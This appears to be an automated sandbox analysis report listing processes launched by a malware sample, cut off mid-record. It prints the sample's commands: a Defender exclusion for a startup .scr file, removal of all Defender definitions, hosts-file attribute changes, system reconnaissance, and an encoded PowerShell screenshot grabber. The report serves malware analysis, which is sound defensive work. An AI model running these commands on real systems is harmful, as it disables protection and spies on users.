                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:22:16:01
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:34
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff667630000
                                                                                                                                                                    File size:100'352 bytes
                                                                                                                                                                    MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:35
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:36
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:37
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:38
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                    Imagebase:0x7ff720240000
                                                                                                                                                                    File size:72'704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:39
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                    Imagebase:0x7ff6483a0000
                                                                                                                                                                    File size:455'656 bytes
                                                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:42
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                    Imagebase:0x7ff609bc0000
                                                                                                                                                                    File size:21'504 bytes
                                                                                                                                                                    MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:43
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:44
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
                                                                                                                                                                    Imagebase:0x7ff7084b0000
                                                                                                                                                                    File size:2'758'280 bytes
                                                                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:45
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
